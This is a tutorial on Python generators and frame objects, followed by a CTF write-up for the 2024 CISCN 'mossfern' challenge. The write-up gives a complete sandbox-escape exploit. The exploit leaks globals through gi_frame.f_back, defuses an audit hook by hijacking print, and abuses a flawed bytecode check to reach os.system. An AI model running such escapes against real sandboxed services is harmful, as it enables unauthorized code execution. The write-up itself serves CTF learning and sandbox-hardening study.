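Basics

What is a generator

A generator is a special kind of iterator in Python. It is created by a generator function or a generator expression and produces values one at a time. After yielding each value it pauses and keeps its current state, so the next request resumes execution exactly where it left off.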
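A generator function produces values with a yield statement instead of return. Calling it does not run the body. It returns a generator object instead. Each time next() is called on that object (next(g), which calls g.__next__()), the function body resumes from where it last paused and runs until it reaches the next yield or the function ends.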
A simple example:
```python
def generator():
    yield 1
    yield 2
    yield 3

g = generator()
print(next(g))  # 1
print(next(g))  # 2
print(next(g))  # 3
```
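To see the pause-and-resume behaviour directly, here is a small sketch. The names counter and n are illustrative only. A local variable keeps its value between next() calls, and once the body finishes, next() raises StopIteration.

```python
def counter():
    n = 0
    while n < 2:
        n += 1      # n keeps its value across pauses
        yield n
    # falling off the end finishes the generator

c = counter()
first = next(c)     # runs until the first yield
second = next(c)    # resumes right after that yield
try:
    next(c)         # the loop ends, so the body finishes
    finished = False
except StopIteration:
    finished = True

print(first, second, finished)  # 1 2 True
```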
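Generator expressions

For more concise code we can use a generator expression. This is a compact syntax for creating a generator object. It looks like a list comprehension but uses parentheses () instead of square brackets.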
```python
g = (i for i in range(3))
print(g)  # <generator object <genexpr> at 0x...>
```
Use next() to step through it:
```python
g = (i for i in range(3))
print(next(g))  # 0
print(next(g))  # 1
...
```
Calling next() by hand every time gets tedious, so we can iterate instead. There are many ways to do this. Here are a few common ones.
Iterating with a for loop
```python
g = (i for i in range(3))
for i in g:
    print(i)
```
Building a list with a list comprehension
```python
g = (i for i in range(3))
print([i for i in g])
```
Unpacking into a list
```python
g = (i for i in range(3))
print([*g])
```
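All three approaches consume the generator. A generator can only be iterated once, so a second pass over the same object yields nothing. A quick check:

```python
g = (i for i in range(3))
first_pass = [*g]    # consumes every value
second_pass = [*g]   # already exhausted, so nothing is left
print(first_pass, second_pass)  # [0, 1, 2] []
```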
Generator attributes

The most commonly used generator attributes are:
gi_code: the generator's code object, which holds the generator function's bytecode and related information
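gi_frame: the frame object the generator executes in (current execution position, local variables, and so on). It is None once the generator has finished.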
gi_running: whether the generator is currently executing. It is True while the generator runs (for example, during next(g)) and False before and after.
gi_yieldfrom: the sub-iterator the generator is currently delegating to through a yield from expression (None otherwise)
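gi_frame.f_locals: strictly an attribute of the frame rather than of the generator. It gives the local variables of the generator's current frame.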
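Of these, gi_frame is used most. It refers to the frame object the generator executes in and holds the execution context of the generator function. Think of it as a "snapshot" of the execution: which instruction it has reached, its local variables, its global variables, and so on.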
For example:
```python
def gen():
    yield 1
    yield 2

g = gen()
print(g.gi_code)
print(g.gi_frame)
print(g.gi_running)
```
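The example above only looks at a fresh generator. The following sketch follows the attributes through a generator's life: gi_running while it executes, gi_yieldfrom while it delegates, and gi_frame after it finishes. The functions inner and outer are illustrative names. The behaviour shown is that of CPython.

```python
def inner():
    yield "from inner"

def outer():
    # gi_running is read from inside the generator, i.e. while it is executing
    yield o.gi_running
    yield from inner()

o = outer()
before = o.gi_running            # False: not started yet
during = next(o)                 # True: captured while running
after = o.gi_running             # False: suspended at the first yield
next(o)                          # now delegating to inner() via yield from
delegate = o.gi_yieldfrom        # the inner generator object
for _ in o:                      # run to completion
    pass
frame_after_finish = o.gi_frame  # None once the generator has finished

print(before, during, after, delegate.gi_code.co_name, frame_after_finish)
# False True False inner None
```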
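Stack frames

In Python, a stack frame is the key runtime data structure for managing function calls and execution state. It holds the important information about a running function, such as the current execution position, local variables, arguments, and a reference to the calling frame. Every function call creates a frame. The frame is normally released when the call returns, unless something still references it, as a generator or a traceback does.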
A frame has the following important attributes:
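f_locals: the frame's local variables as a mapping. Reading it is always possible. Whether writing to it changes the real variables depends on the Python version.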
f_globals: the global-variable dictionary, i.e. the namespace of the module the frame's code belongs to
f_code: the code object, holding the bytecode and other information about the function definition
f_lasti: the index of the last attempted bytecode instruction, i.e. how far execution has got
f_back: the previous (calling) frame, which can be followed to trace the call chain. It is None for the outermost frame.
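The attributes in the list above can be read from any live frame. Here is a minimal sketch that inspects its own frame with sys._getframe(). The function names inner and outer are illustrative.

```python
import sys

def inner(a):
    b = a * 2
    frame = sys._getframe()  # this function's own frame
    return {
        "code_name": frame.f_code.co_name,               # f_code: the code object
        "caller": frame.f_back.f_code.co_name,           # f_back: the calling frame
        "b": frame.f_locals["b"],                        # f_locals: local variables
        "module_globals": frame.f_globals is globals(),  # f_globals: module namespace
        "lasti": frame.f_lasti,                          # f_lasti: bytecode position
    }

def outer():
    return inner(21)

info = outer()
print(info)
```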
There are several ways to obtain a frame object.
sys._getframe()
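sys._getframe() returns the current frame or a frame further up the call stack. Its signature is sys._getframe([depth]). The optional depth counts levels up from the current frame: 0 (the default) is the current frame, 1 is the caller's frame, and so on. As the leading underscore suggests, it is a CPython implementation detail.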
For example:
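```python
import sys

def foo(depth=0):
    frame = sys._getframe()
    for _ in range(depth):
        frame = frame.f_back  # step one level up the call stack
    return frame

print(foo(0))  # foo's own frame
print(foo(1))  # the module-level frame that called foo
print(foo(2))  # one level above the module; usually None when the file is run directly
```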
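The loop over f_back above can also be replaced by passing depth directly, since sys._getframe(1) is the caller's frame. Asking for more levels than the stack has raises ValueError. Here is a sketch with hypothetical helper names:

```python
import sys

def caller_name():
    # depth 0 would be caller_name itself; depth 1 is the frame that called it
    return sys._getframe(1).f_code.co_name

def alpha():
    return caller_name()

def beta():
    return caller_name()

names = (alpha(), beta())
print(names)  # ('alpha', 'beta')

try:
    sys._getframe(10_000)  # deeper than the current call stack
    too_deep = False
except ValueError:
    too_deep = True
print(too_deep)  # True
```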
inspect.currentframe() from the inspect module
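inspect.currentframe() returns the frame of the code that calls it. It can return None on Python implementations without stack frame support.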
```python
import inspect

def foo():
    frame = inspect.currentframe()
    print(frame)

foo()
```
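On CPython both functions hand back the very same frame object. The following sketch checks this. The inspect documentation recommends dropping frame references when you are done, to avoid reference cycles, which the finally clause does. The name compare is illustrative.

```python
import inspect
import sys

def compare():
    via_inspect = inspect.currentframe()  # may be None on non-CPython implementations
    via_sys = sys._getframe()
    try:
        return via_inspect is via_sys, via_inspect.f_code.co_name
    finally:
        del via_inspect, via_sys  # break potential reference cycles

same, name = compare()
print(same, name)  # True compare
```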
Via a generator's gi_frame attribute
A generator object keeps the frame it executes in, so gi_frame can be read directly to inspect its execution state and local variables.
```python
def foo():
    x = 1
    yield x

f = foo()
print(f.gi_frame)
```
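One detail matters for the escape later: in CPython a generator's frame is only linked into the call stack while the generator is running. While it runs, gi_frame.f_back points to whoever resumed it. While it is suspended, f_back is None. That is why the escape payload reads q.gi_frame from inside the generator. Here is a sketch of this behaviour. The names gen and resumer are illustrative.

```python
def gen():
    x = 1
    # Evaluated while the generator is running: f_back is the frame that resumed it.
    yield g.gi_frame.f_back.f_code.co_name

def resumer():
    return next(g)

g = gen()
caller = resumer()                        # name of the frame that resumed g
back_while_suspended = g.gi_frame.f_back  # suspended at the yield, so unlinked
x_value = g.gi_frame.f_locals["x"]        # locals survive the pause

print(caller, back_while_suspended, x_value)  # resumer None 1
```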
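The key technique to master is frame walking: following f_back up the call stack. The stack-frame sandbox escape below is built on it.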
For example:
```python
import sys

f1 = sys._getframe()  # the module-level frame

def func():
    f2 = sys._getframe()    # func's own frame
    print(f2.f_back is f1)  # the caller's frame is the module frame
    print(f2)
    print(f2.f_back)

func()
print(f1)
```
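As the output shows, f2.f_back and f1 are the same frame: `f2.f_back is f1` prints True. In my run both were at 0x000001F13D745DD0. The address differs from run to run.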
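Repeating the f_back step until it returns None walks the whole call chain. Here is a minimal sketch. The helper call_chain and the functions a and b are hypothetical.

```python
import sys

def call_chain():
    names = []
    frame = sys._getframe()
    while frame is not None:  # the outermost frame's f_back is None
        names.append(frame.f_code.co_name)
        frame = frame.f_back
    return names

def b():
    return call_chain()

def a():
    return b()

chain = a()
print(chain)  # starts with ['call_chain', 'b', 'a', ...]
```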
Sandbox escape via stack frames

A typical challenge of this kind works like this:
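```python
flag = "this is flag"

code = """user-supplied code"""

compiled_code = compile(code, "<sandbox>", "exec")

# the user code runs with restricted globals, so it cannot see `flag` directly
exec(compiled_code, {"__builtins__": None}, None)
```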
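On top of this, the user's input is filtered so that many approaches are unavailable. In that situation we can escape the sandbox through stack frames: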
```python
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
g = [*q][0]  # the globals dict of the frame that called exec
```
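The generator has its own frame while it runs. The first f_back leaves the generator frame and reaches the frame of the sandboxed code. The second f_back crosses the exec boundary and reaches the frame that called exec. Its f_globals is the real global namespace.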
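Here is a self-contained sketch of the escape against a toy sandbox. run_sandboxed and the flag value are hypothetical. The sandbox is an assumption and much simpler than a real challenge: fresh globals and no builtins for the user code. Because exec is a C function and adds no Python frame, the second f_back lands on run_sandboxed, whose f_globals holds flag.

```python
flag = "flag{demo}"  # hypothetical secret in the host module's globals

def run_sandboxed(user_code):
    # Toy sandbox (assumption): fresh globals, builtins disabled.
    env = {"__builtins__": None}
    exec(compile(user_code, "<sandbox>", "exec"), env)
    return env

payload = """
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
g = [*q][0]
leaked = g["flag"]
"""

env = run_sandboxed(payload)
print(env["leaked"])  # flag{demo}
```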
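As covered earlier, sys._getframe() and inspect.currentframe() also return frames. However, both require importing a module, and import itself as well as sys and inspect are likely to be blocked. That is why gi_frame is used here.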
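To run the generator you don't have to use unpacking. A list comprehension or a for loop works too, depending on the challenge. next() won't work, though, because next is a builtin, and builtins are usually disabled in these sandboxes.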
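A small experiment illustrates the point about next(). The helper try_in_sandbox is hypothetical. It runs each snippet with `__builtins__` set to None, as the challenge below does. Unpacking, a list comprehension and a for loop all drive the generator without any builtin. next() fails because the name cannot be resolved. The exact exception type may vary by version.

```python
def try_in_sandbox(snippet):
    # Hypothetical helper: run a snippet with builtins disabled and report the result.
    env = {"__builtins__": None}
    try:
        exec(snippet, env)
    except Exception as exc:  # next() cannot be resolved without builtins
        return type(exc).__name__
    return env["r"]

setup = "g = (i for i in [1, 2, 3])\n"
unpacked = try_in_sandbox(setup + "r = [*g]")
comprehension = try_in_sandbox(setup + "r = [i for i in g]")
looped = try_in_sandbox(setup + "r = []\nfor i in g:\n    r += [i]")
stepped = try_in_sandbox(setup + "r = next(g)")

print(unpacked, comprehension, looped, stepped)
```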
Challenge walkthrough: 2024 CISCN mossfern

This challenge is a Python stack-frame sandbox escape. I reproduce it here using the ctfshow environment.
First download the source and analyze it. There is a /run route, and data is sent as JSON.
The submitted data is then passed to runner.py, which filters it and executes it with exec. The code:
```python
def source_simple_check(source):
    """
    Check the source with pure string in string, prevent dangerous strings
    :param source: source code
    :return: None
    """
    from sys import exit
    from builtins import print

    try:
        source.encode("ascii")
    except UnicodeEncodeError:
        print("non-ascii is not permitted")
        exit()

    for i in ["__", "getattr", "exit"]:
        if i in source.lower():
            print(i)
            exit()


def block_wrapper():
    """
    Check the run process with sys.audithook, no dangerous operations should be conduct
    :return: None
    """

    def audit(event, args):
        from builtins import str, print
        import os

        for i in ["marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"]:
            if i in (event + "".join(str(s) for s in args)).lower():
                print(i)
                os._exit(1)

    return audit


def source_opcode_checker(code):
    """
    Check the source in the bytecode aspect, no methods and globals should be load
    :param code: source code
    :return: None
    """
    from dis import dis
    from builtins import str
    from io import StringIO
    from sys import exit

    opcodeIO = StringIO()
    dis(code, file=opcodeIO)
    opcode = opcodeIO.getvalue().split("\n")
    opcodeIO.close()
    for line in opcode:
        if any(x in str(line) for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]):
            if any(x in str(line) for x in ["randint", "randrange", "print", "seed"]):
                break
            print("".join([x for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"] if x in str(line)]))
            exit()


if __name__ == "__main__":
    from builtins import open
    from sys import addaudithook
    from contextlib import redirect_stdout
    from random import randint, randrange, seed
    from io import StringIO
    from random import seed
    from time import time

    source = open(f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt", "r").read()
    source_simple_check(source)
    source_opcode_checker(source)
    code = compile(source, "<sandbox>", "exec")
    addaudithook(block_wrapper())
    outputIO = StringIO()
    with redirect_stdout(outputIO):
        seed(str(time()) + "THIS_IS_SEED" + str(time()))
        exec(code, {
            "__builtins__": None,
            "randint": randint,
            "randrange": randrange,
            "seed": seed,
            "print": print
        }, None)
    output = outputIO.getvalue()

    if "THIS_IS_SEED" in output:
        # roughly: "Write whatever you like at runtime, nothing got stopped at all!"
        print("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!")
        print("bad code-operation why still happened ah?")
    else:
        print(output)
```
runner.py builds a multi-layer sandbox around the user's code. Briefly:
Static string check (source_simple_check): rejects source that is not pure ASCII or that contains __, getattr or exit (case-insensitive).
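Bytecode check (source_opcode_checker): disassembles the code and rejects lines with the LOAD_GLOBAL, IMPORT_NAME or LOAD_METHOD opcodes. A line that mentions one of the whitelisted names randint, randrange, print or seed is allowed.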
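Runtime auditing (block_wrapper): an audit hook installed with sys.addaudithook watches runtime events. It kills the process with os._exit(1) when an event name or its arguments contain open, os, sys, compile or another blacklisted word.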
Restricted execution environment: the code runs via exec(code, {"__builtins__": None, ...}). __builtins__ is set to None, and the global scope only provides the four functions randint, randrange, seed and print.
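The runtime layer relies on audit hooks. A hook receives every audited event as (event, args), which is the same signature as the audit function in block_wrapper. Here is a minimal sketch that only records "open" events instead of killing the process. The names opened and recorder are illustrative. Audit hooks cannot be removed once added, so try this in a throwaway interpreter.

```python
import os
import sys

opened = []

def recorder(event, args):
    # Same (event, args) signature as block_wrapper's hook; this one only records.
    if event == "open":
        opened.append(args[0])  # args for "open" are (path, mode, flags)

sys.addaudithook(recorder)

with open(os.devnull) as fh:
    pass

print(os.devnull in opened)  # True
```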
The restrictions are tight and most approaches are blocked, so we turn to frame walking. The core idea:
```python
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
globals = [*q][0]
```
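With the outer globals in hand we can try to get the builtins module. Double underscores are filtered, so we build the key with string concatenation. Because runner.py runs as `__main__`, the `__builtins__` entry in its globals is the builtins module itself. In an imported module it would usually be a dict.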
```python
builtins = globals['_'+'_builtins_'+'_']
```
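The concatenation works because source_simple_check only scans the source text, while the concatenated string only exists at runtime. Here is a sketch reproducing that check in isolation. passes_simple_check is a hypothetical stand-in written with the same substring test.

```python
BLOCKED = ["__", "getattr", "exit"]

def passes_simple_check(source):
    # Same idea as source_simple_check: a plain substring scan of the source text.
    return not any(word in source.lower() for word in BLOCKED)

direct = "key = '__builtins__'"
split = "key = '_' + '_builtins_' + '_'"

env = {}
exec(split, env)  # the full name only appears once the code runs

print(passes_simple_check(direct), passes_simple_check(split), env["key"])
# False True __builtins__
```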
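Next we need to get past block_wrapper. The audit hook inspects the actual event names and arguments at runtime, so hiding strings behind variable assignments or concatenation does not help here.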
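When the hook finds a blacklisted string, it calls print and then os._exit. The hook fetches print from the builtins module (from builtins import str, print) every time it runs. If we replace builtins.print with our own function, that function runs first. It can then swap os._exit for something harmless, which gets us out of the sandbox.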
The code is similar to how we got builtins. Since os is a local variable of the audit function, we read f_locals this time and use setattr to overwrite os._exit.
We only need to go up two frames (from the generator to rewrite_print, then to audit), not all the way to the globals:
```python
def rewrite_print(a):
    # generator -> rewrite_print -> audit(): two hops reach the hook's locals
    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])
    locals = [*q][0]
    if 'os' in locals:
        builtins.setattr(locals['os'], '_ex'+'it', print)

builtins.print = rewrite_print
```
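The hijack above can be tried without touching the real builtins or os modules. This sketch rests on stated assumptions. fake_builtins, fake_os, kill, audit and hijacked_report are hypothetical stand-ins for builtins, os, os._exit, block_wrapper's hook and rewrite_print. The replacement kill switch here is a no-op lambda, whereas the exploit uses print.

```python
import types

# Hypothetical stand-ins: fake_builtins holds the report function the hook looks up,
# fake_os holds the kill switch.
fake_builtins = types.ModuleType("fake_builtins")
fake_os = types.ModuleType("fake_os")
fake_builtins.report = print

def kill(code):
    raise SystemExit(code)  # stands in for os._exit, which would end the process

fake_os.kill = kill

def audit(event):
    # Mirrors block_wrapper's audit(): both names are fetched every time it runs.
    report = fake_builtins.report
    os_mod = fake_os
    if "bad" in event:
        report("bad")
        os_mod.kill(1)
    return "survived"

def hijacked_report(msg):
    # generator frame -> hijacked_report -> audit: two f_back hops reach audit()'s locals
    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])
    hook_locals = [*q][0]
    if "os_mod" in hook_locals:
        setattr(hook_locals["os_mod"], "kill", lambda code: None)  # defuse the kill switch

fake_builtins.report = hijacked_report
result = audit("bad event")
print(result)  # survived
```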
Then take eval from builtins, use it to get `__import__`, import os and call system for RCE:
```python
eval = builtins.eval
imp = eval('builtins._'+'_import_'+'_')
system = imp("os").system
system("ls /")
```
Putting these pieces together gives a skeleton:
```python
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
globals = [*q][0]
builtins = globals['_'+'_builtins_'+'_']

def rewrite_print(a):
    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])
    locals = [*q][0]
    if 'os' in locals:
        builtins.setattr(locals['os'], '_ex'+'it', print)
builtins.print = rewrite_print

eval = builtins.eval
imp = eval('builtins._'+'_import_'+'_')
system = imp("os").system
system("ls /")
```
Finally we need to bypass source_opcode_checker. A close look shows that it contains a logic flaw:
```python
for line in opcode:
    if any(x in str(line) for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]):
        if any(x in str(line) for x in ["randint", "randrange", "print", "seed"]):
            break  # leaves the whole loop: later lines are never checked
        print("".join([x for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"] if x in str(line)]))
        exit()
```
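The break exits the whole for loop instead of moving on to the next line (as continue would). If we can trigger the break, the bytecode of everything after it is never checked.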
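The difference between break and continue can be shown on a tiny hand-written listing. The check function and the two simplified dis-style lines are hypothetical. The first line contains a whitelisted name, the second does not.

```python
OPCODES = ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]
ALLOWED = ["randint", "randrange", "print", "seed"]

def check(listing, on_allowed):
    # Returns True if the listing passes. on_allowed is "break" (the challenge's
    # behaviour) or "continue" (the stricter alternative).
    for line in listing:
        if any(op in line for op in OPCODES):
            if any(name in line for name in ALLOWED):
                if on_allowed == "break":
                    break
                continue
            return False
    return True

listing = [
    "LOAD_GLOBAL              0 (print)",
    "LOAD_GLOBAL              0 (q)",
]

print(check(listing, "break"), check(listing, "continue"))  # True False
```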
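My first idea was to put a print(1) at the very top to trigger the break. When I tried it, the checker printed LOAD_GLOBAL and exited. It had hit a LOAD_GLOBAL line that did not mention print.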
To see why, I debugged it locally and set a breakpoint in the checker.
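There is a LOAD_GLOBAL q. Here q is the generator we wrote earlier. A generator expression has its own scope, so the reference to q inside it compiles to LOAD_GLOBAL. q is not on the whitelist, so the checker exits.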
What about print? Looking at the opcode listing, print is loaded with LOAD_NAME, not LOAD_GLOBAL.
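An AI assistant told me this was a version difference (LOAD_NAME in Python 3.11+). In fact it is not version-specific. Module-level code, which is what exec runs here, reads names with LOAD_NAME in every Python 3 version, while code inside a function or generator scope uses LOAD_GLOBAL. Either way, a bare print(1) cannot trigger the break, so another approach is needed.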
We already know that the generator's disassembly contains a LOAD_GLOBAL. So let's reference print inside a generator: change the first line to (print for _ in [1]) and debug again.
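This time it passes. The generator expressions' code objects are disassembled in the order they appear, so the first LOAD_GLOBAL line is now the one for print in (print for _ in [1]). Because print is on the whitelist, the loop breaks, and the source_opcode_checker restriction is bypassed.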
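The LOAD_NAME / LOAD_GLOBAL difference seen in the debugger can be reproduced with dis. In this sketch, the source string is illustrative. dis.dis disassembles nested code objects as well, so the generator expression's own code shows up in the same listing.

```python
import dis
import io

source = "x = print\n(print for _ in [1])\n"
out = io.StringIO()
dis.dis(compile(source, "<sandbox>", "exec"), file=out)  # also disassembles nested code objects
lines = out.getvalue().splitlines()

# module-level code reads print with LOAD_NAME; the generator expression uses LOAD_GLOBAL
module_uses_load_name = any("LOAD_NAME" in ln and "print" in ln for ln in lines)
genexpr_uses_load_global = any("LOAD_GLOBAL" in ln and "print" in ln for ln in lines)

print(module_uses_load_name, genexpr_uses_load_global)  # True True
```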
Putting it all together, the full exploit is:
```python
(print for _ in [1])
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
globals = [*q][0]
builtins = globals['_'+'_builtins_'+'_']

def rewrite_print(a):
    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])
    locals = [*q][0]
    if 'os' in locals:
        builtins.setattr(locals['os'], '_ex'+'it', print)
builtins.print = rewrite_print

eval = builtins.eval
imp = eval('builtins._'+'_import_'+'_')
system = imp("os").system
system("ls /")
```
A small Python script converts it into JSON:
```python
import json

code = """
(print for _ in [1])
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
globals = [*q][0]
builtins = globals['_'+'_builtins_'+'_']

def rewrite_print(a):
    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])
    locals = [*q][0]
    if 'os' in locals:
        builtins.setattr(locals['os'], '_ex'+'it', print)
builtins.print = rewrite_print

eval = builtins.eval
imp = eval('builtins._'+'_import_'+'_')
system = imp("os").system
system("ls /")
"""

json_code = json.dumps({"code": code})
print(json_code)
```
Output:
```json
{"code": "\n(print for _ in [1])\nq = (q.gi_frame.f_back.f_back.f_globals for _ in [1])\nglobals = [*q][0]\nbuiltins = globals['_'+'_builtins_'+'_']\n\ndef rewrite_print(a):\n    q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])\n    locals = [*q][0]\n    if 'os' in locals:\n        builtins.setattr(locals['os'], '_ex'+'it', print)\nbuiltins.print = rewrite_print\n\neval = builtins.eval\nimp = eval('builtins._'+'_import_'+'_')\nsystem = imp(\"os\").system\nsystem(\"ls /\")\n"}
```
Send it to the site's /run endpoint with the Content-Type header set to application/json.
This returns the flag.
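If you prefer scripting the request over using a browser tool, the standard library is enough. This sketch rests on assumptions. The URL is a hypothetical placeholder for the challenge host, and exp should hold the full exploit shown above. The actual send is left commented out.

```python
import json
import urllib.request

URL = "http://challenge.example/run"  # hypothetical: replace with the real host

exp = "(print for _ in [1])\n"  # placeholder: paste the full exploit here

def build_request(code):
    body = json.dumps({"code": code}).encode()
    return urllib.request.Request(
        URL,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_request(exp)
# print(urllib.request.urlopen(req).read().decode())  # actually sends it
```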